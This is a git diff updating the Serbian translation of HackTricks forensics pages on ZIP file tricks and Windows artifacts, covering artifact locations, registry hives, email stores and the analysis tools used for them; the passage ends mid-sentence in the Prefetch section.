-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE PRETPLATE**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md index 69bdb763a..62aa254aa 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md @@ -1,44 +1,46 @@ # Trikovi sa ZIP fajlovima +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Pomozite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu**, proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} -**Command-line alati** za upravljanje **zip fajlovima** su neophodni za dijagnostikovanje, popravku i probijanje zip fajlova. Evo nekih ključnih alata: +**Alati komandne linije** za upravljanje **zip fajlovima** su esencijalni za dijagnostikovanje, popravku i probijanje zip fajlova. Evo nekih ključnih alata: - **`unzip`**: Otkriva zašto se zip fajl možda ne može dekompresovati. -- **`zipdetails -v`**: Pruža detaljnu analizu polja formata zip fajla. -- **`zipinfo`**: Lista sadržaj zip fajla bez ekstrakcije. +- **`zipdetails -v`**: Nudi detaljnu analizu polja formata zip fajla. +- **`zipinfo`**: Lista sadržaj zip fajla bez njihovog ekstrahovanja. - **`zip -F input.zip --out output.zip`** i **`zip -FF input.zip --out output.zip`**: Pokušajte da popravite oštećene zip fajlove. - **[fcrackzip](https://github.com/hyc/fcrackzip)**: Alat za brute-force probijanje lozinki zip fajlova, efikasan za lozinke do oko 7 karaktera. -Specifikacija [Zip formata fajla](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) pruža sveobuhvatne detalje o strukturi i standardima zip fajlova. +Specifikacija formata zip fajlova pruža sveobuhvatne detalje o strukturi i standardima zip fajlova. -Važno je napomenuti da zip fajlovi zaštićeni lozinkom **ne šifruju imena fajlova ili veličine fajlova** unutar sebe, što je sigurnosna slabost koju ne dele RAR ili 7z fajlovi koji šifruju ove informacije. Osim toga, zip fajlovi koji su šifrovani starijom metodom ZipCrypto su ranjivi na **napad sa poznatim tekstom** ako je dostupna nešifrovana kopija komprimiranog fajla. Ovaj napad koristi poznati sadržaj za probijanje lozinke zip fajla, ranjivost koja je detaljno objašnjena u [HackThis-ovom članku](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) i dalje objašnjena u [ovom naučnom radu](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf). Međutim, zip fajlovi koji su obezbeđeni **AES-256** šifrovanjem su imuni na ovaj napad sa poznatim tekstom, što pokazuje važnost izbora sigurnih metoda šifrovanja za osetljive podatke. +Važno je napomenuti da zip fajlovi zaštićeni lozinkom **ne šifruju imena fajlova niti veličine fajlova** unutar sebe, sigurnosni propust koji nije zajednički za RAR ili 7z fajlove koji šifruju ove informacije. Osim toga, zip fajlovi šifrovani starijom metodom ZipCrypto su ranjivi na **napad sa tekstom u otvorenom obliku** ako je dostupna nešifrovana kopija kompresovanog fajla. Ovaj napad koristi poznati sadržaj za probijanje lozinke zip fajla, ranjivost detaljno opisana u [HackThis-ovom članku](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) i dalje objašnjena u [ovom naučnom radu](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf). Međutim, zip fajlovi obezbeđeni sa **AES-256** šifrovanjem su imuni na ovaj napad sa tekstom u otvorenom obliku, pokazujući važnost izbora sigurnih metoda šifrovanja za osetljive podatke. ## Reference * [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/) +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Pomozite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu**, proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md index 261fb3b6a..310b2dcc2 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/README.md +++ b/forensics/basic-forensic-methodology/windows-forensics/README.md @@ -1,20 +1,21 @@ -# Windows Artifakti +# Windows Artifakati -## Windows Artifakti +## Windows Artifakati + +{% hint style="success" %} +Naučite i vežbajte AWS hakovanje: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte GCP hakovanje: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %}
@@ -24,26 +25,26 @@ Drugi načini podrške HackTricks-u: ### Windows 10 Obaveštenja -Na putanji `\Users\\AppData\Local\Microsoft\Windows\Notifications` možete pronaći bazu podataka `appdb.dat` (pre Windows ažuriranja) ili `wpndatabase.db` (nakon Windows ažuriranja). +Na putanji `\Users\\AppData\Local\Microsoft\Windows\Notifications` možete pronaći bazu podataka `appdb.dat` (pre Windows godišnjice) ili `wpndatabase.db` (nakon Windows godišnjice). Unutar ove SQLite baze podataka, možete pronaći tabelu `Notification` sa svim obaveštenjima (u XML formatu) koje mogu sadržati zanimljive podatke. ### Vremenska Linija -Vremenska linija je Windows karakteristika koja pruža **hronološku istoriju** posećenih web stranica, uređenih dokumenata i izvršenih aplikacija. +Vremenska linija je Windows karakteristika koja pruža **hronološku istoriju** posećenih web stranica, uređenih dokumenata i pokrenutih aplikacija. -Baza podataka se nalazi na putanji `\Users\\AppData\Local\ConnectedDevicesPlatform\\ActivitiesCache.db`. Ovu bazu podataka možete otvoriti pomoću alata za SQLite ili alata [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **koji generiše 2 datoteke koje se mogu otvoriti pomoću alata** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md). +Baza podataka se nalazi na putanji `\Users\\AppData\Local\ConnectedDevicesPlatform\\ActivitiesCache.db`. Ovu bazu podataka možete otvoriti sa alatom za SQLite ili sa alatom [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **koji generiše 2 datoteke koje se mogu otvoriti sa alatom** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md). ### ADS (Alternate Data Streams) -Preuzete datoteke mogu sadržati **ADS Zone.Identifier** koji ukazuje **kako** je datoteka **preuzeta** sa intraneta, interneta, itd. Neke softverske aplikacije (poput pretraživača) obično dodaju još **više** **informacija** poput **URL-a** sa kog je datoteka preuzeta. +Preuzete datoteke mogu sadržati **ADS Zone.Identifier** koji ukazuje **kako** je datoteka **preuzeta** sa intraneta, interneta, itd. Neki softveri (poput pretraživača) obično dodaju **još** **informacija** poput **URL-a** sa kog je datoteka preuzeta. ## **Rezervne Kopije Datoteka** ### Kanta za Reciklažu -U Vista/Win7/Win8/Win10 **Kanta za Reciklažu** se može naći u folderu **`$Recycle.bin`** u korenu drajva (`C:\$Recycle.bin`).\ -Kada se datoteka obriše u ovom folderu, kreiraju se 2 specifične datoteke: +U Vista/Win7/Win8/Win10 **Kanta za Reciklažu** se može naći u fascikli **`$Recycle.bin`** u korenu drajva (`C:\$Recycle.bin`).\ +Kada se datoteka obriše u ovoj fascikli, kreiraju se 2 specifične datoteke: * `$I{id}`: Informacije o datoteci (datum kada je obrisana} * `$R{id}`: Sadržaj datoteke @@ -72,7 +73,7 @@ Unos u registar `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupResto ![](<../../../.gitbook/assets/image (522).png>) -U registru `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` takođe se nalaze informacije o konfiguraciji `Volume Shadow Copies`. +Registar `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` takođe sadrži informacije o konfiguraciji `Volume Shadow Copies`. ### Office automatski sačuvani fajlovi @@ -89,9 +90,9 @@ Windows **automatski** **kreira** ove **prečice** kada korisnik **otvori, koris * Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\` * Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\` -Kada se kreira folder, takođe se kreira veza ka folderu, roditeljskom folderu i pradedovskom folderu. +Kada se kreira folder, takođe se kreira veza ka folderu, roditeljskom folderu i pradedinom folderu. -Ove automatski kreirane link datoteke **sadrže informacije o poreklu** kao da je to **fajl** **ili** folder, **MAC** **vremena** tog fajla, **informacije o volumenu** gde je fajl smešten i **folder ciljnog fajla**. Ove informacije mogu biti korisne za oporavak tih fajlova u slučaju da su uklonjeni. +Ove automatski kreirane link datoteke **sadrže informacije o poreklu** kao da je to **fajl** **ili** **folder**, **MAC** **vremena** tog fajla, **informacije o volumenu** gde je fajl smešten i **folder ciljnog fajla**. Ove informacije mogu biti korisne za oporavak tih fajlova u slučaju da su uklonjeni. Takođe, **datum kreiranja linka** datoteke je prvo **vreme** kada je originalni fajl **prvi** **put** **korišćen**, a **datum** **izmene** link datoteke je **poslednje** **vreme** kada je originalni fajl korišćen. @@ -108,7 +109,7 @@ U ovom alatu ćete pronaći **2 seta** vremenskih oznaka: 2. LinkAccessDate 3. LinkCreationDate. -Prvi set vremenskih oznaka se odnosi na **vremenske oznake samog fajla**. Drugi set se odnosi na **vremenske oznake povezanog fajla**. +Prvi set vremenskih oznaka odnosi se na **vremenske oznake samog fajla**. Drugi set se odnosi na **vremenske oznake povezanog fajla**. Možete dobiti iste informacije pokretanjem Windows CLI alata: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd) ``` @@ -116,11 +117,11 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs ``` ### Jumplists -Ovo su nedavne datoteke koje su označene po aplikaciji. To je lista nedavnih datoteka koje je koristila aplikacija na koju možete pristupiti u svakoj aplikaciji. Mogu se kreirati automatski ili biti prilagođene. +Ovo su nedavne datoteke koje su označene po aplikaciji. To je lista **nedavnih datoteka koje je koristila aplikacija** do kojih možete pristupiti u svakoj aplikaciji. Mogu se kreirati **automatski ili po želji**. -Automatski kreirane **jumpliste** se čuvaju u `C:\Users\{korisničko_ime}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. Jumplisti se nazivaju prema formatu `{id}.autmaticDestinations-ms` gde je početni ID ID aplikacije. +**Jumplists** koje se automatski kreiraju čuvaju se u `C:\Users\{korisničko_ime}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. Jumplisti se nazivaju prema formatu `{id}.autmaticDestinations-ms` gde je početni ID ID aplikacije. -Prilagođene jumpliste se čuvaju u `C:\Users\{korisničko_ime}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` i obično ih kreira aplikacija jer se nešto važno desilo sa datotekom (možda označena kao omiljena). +Prilagođeni jumplisti čuvaju se u `C:\Users\{korisničko_ime}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` i obično ih kreira aplikacija jer se nešto **važno** dogodilo s datotekom (možda je označena kao omiljena). **Vreme kreiranja** bilo kog jumplista pokazuje **prvi put kada je datoteka pristupljena** i **vreme poslednje izmene**. @@ -134,13 +135,13 @@ Jumpliste možete pregledati koristeći [**JumplistExplorer**](https://ericzimme [**Pratite ovaj link da saznate šta su shellbags.**](interesting-windows-registry-keys.md#shellbags) -## Korišćenje Windows USB uređaja +## Upotreba Windows USB uređaja Moguće je identifikovati da je USB uređaj korišćen zahvaljujući kreiranju: * Windows Recent fascikle * Microsoft Office Recent fascikle -* Jumpliste +* Jumplisti Imajte na umu da neke LNK datoteke umesto da pokazuju na originalnu putanju, pokazuju na fasciklu WPDNSE: @@ -154,19 +155,19 @@ Datoteke u fascikli WPDNSE su kopija originalnih datoteka, pa neće preživeti r ### setupapi -Proverite datoteku `C:\Windows\inf\setupapi.dev.log` da biste dobili vremenske oznake o tome kada je USB veza uspostavljena (tražite `Section start`). +Proverite datoteku `C:\Windows\inf\setupapi.dev.log` da biste dobili vremenske oznake kada je USB veza uspostavljena (tražite `Section start`). -![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>) +![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>) -### USB detektiv +### USB Detective [**USBDetective**](https://usbdetective.com) se može koristiti za dobijanje informacija o USB uređajima koji su bili povezani sa slikom. ![](<../../../.gitbook/assets/image (483).png>) -### Čišćenje priključka i reprodukcije +### Čišćenje Plug and Play -Zakazani zadatak poznat kao 'Čišćenje priključka i reprodukcije' je primarno dizajniran za uklanjanje zastarelih verzija drajvera. Za razliku od navedene svrhe zadržavanja najnovije verzije drajver paketa, online izvori sugerišu da takođe cilja drajvere koji su neaktivni 30 dana. Stoga, drajveri za prenosive uređaje koji nisu povezani u poslednjih 30 dana mogu biti podložni brisanju. +Zakazani zadatak poznat kao 'Plug and Play Cleanup' je primarno dizajniran za uklanjanje zastarelih verzija drajvera. Za razliku od navedene svrhe zadržavanja najnovije verzije drajver paketa, online izvori sugerišu da takođe cilja drajvere koji su neaktivni 30 dana. Stoga, drajveri za prenosive uređaje koji nisu povezani u poslednjih 30 dana mogu biti podložni brisanju. Zadatak se nalazi na sledećoj putanji: `C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`. @@ -178,12 +179,12 @@ Prikazan je snimak ekrana sadržaja zadatka: - **pnpclean.dll**: Ova DLL je odgovorna za stvarni proces čišćenja. - **UseUnifiedSchedulingEngine**: Postavljeno na `TRUE`, što ukazuje na korišćenje generičkog motora za zakazivanje zadataka. - **MaintenanceSettings**: -- **Period ('P1M')**: Usmerava Planer zadataka da pokrene zadatak čišćenja mesečno tokom redovnog automatskog održavanja. -- **Deadline ('P2M')**: Nalaže Planeru zadataka da, ako zadatak ne uspe dva uzastopna meseca, izvrši zadatak tokom hitnog automatskog održavanja. +- **Period ('P1M')**: Usmerava Task Scheduler da pokrene zadatak čišćenja mesečno tokom redovnog automatskog održavanja. +- **Deadline ('P2M')**: Nalaže Task Scheduleru da, ako zadatak ne uspe dva uzastopna meseca, izvrši zadatak tokom hitnog automatskog održavanja. Ova konfiguracija obezbeđuje redovno održavanje i čišćenje drajvera, sa odredbama za ponovni pokušaj zadatka u slučaju uzastopnih neuspeha. -**Za više informacija proverite:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html) +**Za više informacija pogledajte:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html) ## Emailovi @@ -198,7 +199,7 @@ Takođe, unutar zaglavlja `References` i `In-Reply-To` možete pronaći ID poruk ### Windows Mail aplikacija -Ova aplikacija čuva emailove u HTML ili tekstu. Emailove možete pronaći unutar podfascikli unutar `\Users\\AppData\Local\Comms\Unistore\data\3\`. Emailovi se čuvaju sa ekstenzijom `.dat`. +Ova aplikacija čuva emailove u HTML ili tekstualnom formatu. Emailove možete pronaći unutar podfoldera unutar `\Users\\AppData\Local\Comms\Unistore\data\3\`. Emailovi se čuvaju sa ekstenzijom `.dat`. **Metapodaci** emailova i **kontakti** mogu se pronaći unutar **EDB baze podataka**: `\Users\\AppData\Local\Comms\UnistoreDB\store.vol` @@ -213,7 +214,7 @@ Kada se koriste Exchange serveri ili Outlook klijenti, postojaće neka MAPI zagl * `Mapi-Entry-ID`: Identifikator poruke. * `Mappi-Message-Flags` i `Pr_last_Verb-Executed`: Informacije o MAPI klijentu (poruka pročitana? nepročitana? odgovorena? preusmerena? van kancelarije?) -U Microsoft Outlook klijentu, sve poslate/primljene poruke, podaci o kontaktima i podaci o kalendaru se čuvaju u PST datoteci u: +U Microsoft Outlook klijentu, sve poslate/primljene poruke, podaci o kontaktima i podaci o kalendaru čuvaju se u PST datoteci u: * `%USERPROFILE%\Local Settings\Application Data\Microsoft\Outlook` (WinXP) * `%USERPROFILE%\AppData\Local\Microsoft\Outlook` @@ -225,11 +226,11 @@ Možete otvoriti PST datoteku koristeći alatku [**Kernel PST Viewer**](https:// ![](<../../../.gitbook/assets/image (485).png>) ### Microsoft Outlook OST Files -**OST fajl** se generiše od strane Microsoft Outlook-a kada je konfigurisan sa **IMAP** ili **Exchange** serverom, čuvajući slične informacije kao PST fajl. Ovaj fajl je sinhronizovan sa serverom, zadržavajući podatke za **poslednjih 12 meseci** do **maksimalne veličine od 50GB**, i nalazi se u istom direktorijumu kao i PST fajl. Za pregled OST fajla, može se koristiti [**Kernel OST pregledač**](https://www.nucleustechnologies.com/ost-viewer.html). +**OST fajl** se generiše od strane Microsoft Outlook-a kada je konfigurisan sa **IMAP** ili **Exchange** serverom, čuvajući slične informacije kao PST fajl. Ovaj fajl je sinhronizovan sa serverom, zadržavajući podatke za **poslednjih 12 meseci** do **maksimalne veličine od 50GB**, i nalazi se u istom direktorijumu kao PST fajl. Za pregled OST fajla, može se koristiti [**Kernel OST pregledač**](https://www.nucleustechnologies.com/ost-viewer.html). ### Dobijanje Priloga -Izgubljeni prilozi mogu biti povratni iz: +Izgubljeni prilozi mogu biti povratni sa: - Za **IE10**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook` - Za **IE11 i novije**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook` @@ -238,15 +239,15 @@ Izgubljeni prilozi mogu biti povratni iz: **Thunderbird** koristi **MBOX fajlove** za čuvanje podataka, smeštenih u `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`. -### Slika Sličica +### Sličice Slika -- **Windows XP i 8-8.1**: Pristupanje fascikli sa sličicama generiše `thumbs.db` fajl koji čuva preglede slika, čak i nakon brisanja. +- **Windows XP i 8-8.1**: Pristupanje folderu sa sličicama generiše `thumbs.db` fajl koji čuva preglede slika, čak i nakon brisanja. - **Windows 7/10**: `thumbs.db` se kreira prilikom pristupa preko mreže putem UNC putanje. -- **Windows Vista i novije**: Pregledi sličica su centralizovani u `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` sa fajlovima nazvanim **thumbcache\_xxx.db**. [**Thumbsviewer**](https://thumbsviewer.github.io) i [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) su alati za pregledanje ovih fajlova. +- **Windows Vista i noviji**: Pregledi sličica su centralizovani u `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` sa fajlovima nazvanim **thumbcache\_xxx.db**. [**Thumbsviewer**](https://thumbsviewer.github.io) i [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) su alati za pregledanje ovih fajlova. -### Informacije iz Windows Registra +### Informacije o Windows Registru -Windows Registar, koji čuva obimne podatke o sistemu i korisničkim aktivnostima, smešten je u fajlovima u: +Windows Registry, koji čuva obimne podatke o sistemu i korisničkoj aktivnosti, nalazi se u fajlovima: - `%windir%\System32\Config` za različite `HKEY_LOCAL_MACHINE` podključeve. - `%UserProfile%{User}\NTUSER.DAT` za `HKEY_CURRENT_USER`. @@ -257,24 +258,24 @@ Windows Registar, koji čuva obimne podatke o sistemu i korisničkim aktivnostim Neki alati su korisni za analizu registarskih fajlova: -* **Uređivač Registra**: Instaliran je u Windows-u. To je grafički interfejs za navigaciju kroz Windows registar trenutne sesije. -* [**Istraživač Registra**](https://ericzimmerman.github.io/#!index.md): Omogućava vam da učitate registarski fajl i navigirate kroz njih pomoću grafičkog interfejsa. Takođe sadrži Obeleživače koji ističu ključeve sa zanimljivim informacijama. +* **Registry Editor**: Instaliran je u Windows-u. To je grafički interfejs za navigaciju kroz Windows registar trenutne sesije. +* [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md): Omogućava učitavanje registarskog fajla i navigaciju kroz njih pomoću grafičkog interfejsa. Takođe sadrži obeleživače koji ističu ključeve sa zanimljivim informacijama. * [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Ima grafički interfejs koji omogućava navigaciju kroz učitani registar i takođe sadrži dodatke koji ističu zanimljive informacije unutar učitanog registra. * [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html): Još jedna aplikacija sa grafičkim interfejsom sposobna da izvuče važne informacije iz učitanog registra. -### Obnavljanje Obrisanih Elemnata +### Obnavljanje Obrisanih Elemenata -Kada se ključ obriše, označava se kao takav, ali dok prostor koji zauzima nije potreban, neće biti uklonjen. Stoga, korišćenjem alata poput **Istraživača Registra** moguće je povratiti ove obrisane ključeve. +Kada se ključ obriše, označava se kao takav, ali dok prostor koji zauzima nije potreban, neće biti uklonjen. Stoga, korišćenjem alata poput **Registry Explorer** moguće je povratiti ove obrisane ključeve. -### Vreme Poslednje Izmenje +### Vreme Poslednje Izmena -Svaki Ključ-Vrednost sadrži **vremensku oznaku** koja pokazuje poslednje vreme kada je izmenjen. +Svaki Ključ-Vrednost sadrži **vremensku oznaku** koja pokazuje kada je poslednji put bio izmenjen. ### SAM -Fajl/hajv **SAM** sadrži **korisnike, grupe i lozinke korisnika** sistema. +Fajl/hive **SAM** sadrži heševe **korisnika, grupa i lozinki korisnika** sistema. -U `SAM\Domains\Account\Users` možete dobiti korisničko ime, RID, poslednju prijavu, poslednju neuspelu prijavu, brojač prijava, politiku lozinke i kada je nalog kreiran. Da biste dobili **heševe**, takođe **trebate** fajl/hajv **SYSTEM**. +U `SAM\Domains\Account\Users` možete dobiti korisničko ime, RID, poslednju prijavu, poslednju neuspelu prijavu, brojač prijava, politiku lozinke i kada je nalog kreiran. Da biste dobili **heševe**, takođe **trebate** fajl/hive **SYSTEM**. ### Zanimljivi unosi u Windows Registru @@ -286,25 +287,25 @@ U `SAM\Domains\Account\Users` možete dobiti korisničko ime, RID, poslednju pri ### Osnovni Windows Procesi -U [ovom postu](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) možete saznati o zajedničkim Windows procesima kako biste otkrili sumnjive ponašanja. +U [ovom postu](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) možete saznati o zajedničkim Windows procesima za otkrivanje sumnjivih ponašanja. ### Nedavni Windows Aplikacije Unutar registra `NTUSER.DAT` na putanji `Software\Microsoft\Current Version\Search\RecentApps` možete pronaći podključeve sa informacijama o **izvršenoj aplikaciji**, **poslednjem vremenu** kada je izvršena, i **broju puta** koliko je pokrenuta. -### BAM (Moderator Pozadinske Aktivnosti) +### BAM (Background Activity Moderator) -Možete otvoriti fajl `SYSTEM` sa uređivačem registra i unutar putanje `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` možete pronaći informacije o **aplikacijama izvršenim od strane svakog korisnika** (obratite pažnju na `{SID}` u putanji) i u **koje vreme** su izvršene (vreme je unutar Vrednosti podataka registra). +Možete otvoriti fajl `SYSTEM` sa registarskim editorom i unutar putanje `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` možete pronaći informacije o **aplikacijama izvršenim od strane svakog korisnika** (obratite pažnju na `{SID}` u putanji) i u **koje vreme** su izvršene (vreme je unutar Vrednosti podataka registra). ### Windows Prefetch -Prefetching je tehnika koja omogućava računaru da tiho **preuzme neophodne resurse potrebne za prikaz sadržaja** koje korisnik 